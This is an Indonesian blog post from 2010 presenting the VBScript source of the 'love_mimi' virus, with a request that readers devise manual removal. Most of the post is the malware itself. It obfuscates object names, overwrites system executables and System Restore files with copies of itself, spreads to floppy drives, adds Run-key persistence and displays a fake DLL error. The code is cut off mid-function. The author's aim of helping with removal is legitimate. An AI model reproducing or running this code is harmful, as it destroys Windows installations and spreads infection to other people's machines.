Home » » Source Code virus love_mimi

Source Code virus love_mimi

Written By MUHAMAD IRFAN on Monday, 20 December 2010 | 02:39

Nampaknya saya gak sempat dan tidak akan sempat membuat analisis virus bandel yang satu ini. tapi saya harap dengan memposting source code ini ada diantara teman2 yang mau membuat cara manual removalnya. dengan source code ini anda bisa melihat langsung badan virus dan apa saja yang dilakukannya. sehingga dapat melakukan pembersihan manual.
wassalam
--------------------------------[mulai]-----------------------
Set love = createobject(StrReverse("tcejbOmetsySelif.gnitpircS"))

Set dear = createobject(StrReverse("llehS.tpircSW"))

qi = "c:\regedit.vbs"

syau = "c:\mymimi.vbs"

heiji = "c:\notepad.vbs"

forest = "c:\antivirus.vbs"

han = "c:\windows\svchost.exe"

tachoor = "c:\windows\EXPL0RER.vbs"

mimi = "c:\windows\system\WinUpdt.vbs"

on error resume next

love.CopyFile wscript.scriptfullname, tachoor

on error resume next

love.CopyFile wscript.scriptfullname, mimi

on error resume next

iqra = dear.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kernell32")

If iqra <> "c:\windows\svchost.exe " & tachoor then

on error resume next

dear.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows ScriptingHost\Settings\Timeout", 0, "REG_DWORD"

dear.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kernell32", "c:\windows\svchost.exe " & tachoor

dear.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVGuard32", "c:\windows\svchost.exe " & mimi

dear.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PCMAVscanner", "c:\windows\svchost.exe " & syau

done = MsgBox("The application or DLL C:\WINDOWS\system32\MSVBVM60.DLL is not a valid Windows image. Please check this againts your installation diskette.", 16, "msvbvm60.dll - Bad Image")

dear.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\SVCH0ST", "c:\windows\svchost.exe " & mimi

love.CopyFile wscript.scriptfullname, "A:\diary_rahmi.vbe"

on error resume next

love.CopyFile wscript.scriptfullname, tachoor

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\msvbvm60.dll"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\msvbvm60.dll"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\msvbvm50.dll"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\msihnd.dll"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\msvbvnvvm60.dll"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\TASKMAN.exe"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\NOTEPAD.exe"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\R.com"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\REGEDIT.com"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\regedit.exe"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\nusrmgr.cpl"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\cmd.exe"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\control.exe"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\msiexec.exe"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\regedt32.exe"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\taskman.exe"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\taskmgr.exe"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\command.com"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\T.com"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\TASKMGR.com"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\Restore\rstrui.exe"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\Restore\srdiag.exe"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\Restore\srframe.mmf"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\Restore\rstrlog.dat"

on error resume next

cdrsqnx()

dwozmc()

ontrus()

else

on error resume next

love.CopyFile wscript.scriptfullname, "A:\diary_mimi.vbs"

on error resume next

love.CopyFile wscript.scriptfullname, tachoor

on error resume next

love.CopyFile wscript.scriptfullname, "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\PCMAVExtMonitor.vbs"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\msvbvm60.dll"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\msvbvm50.dll"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\msvbvm60.dll"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\msvbvm60.dll"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\msvbvnvvm60.dll"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\nusrmgr.cpl"

on error resume next

hcdmshsx()

cdrsqnx()

dwozmc()

ontrus()

End if

Sub hcdmshsx()

Dim married

on error resume next

married = "


my_mimi

muka bego!! ngapain mandangin kompie ini trus2an!? cari dong anti virusnya!!


klik di sini!

0 Komentar:

Post a Comment

Powered by Blogger.

Followers

Arsip

TERPANAS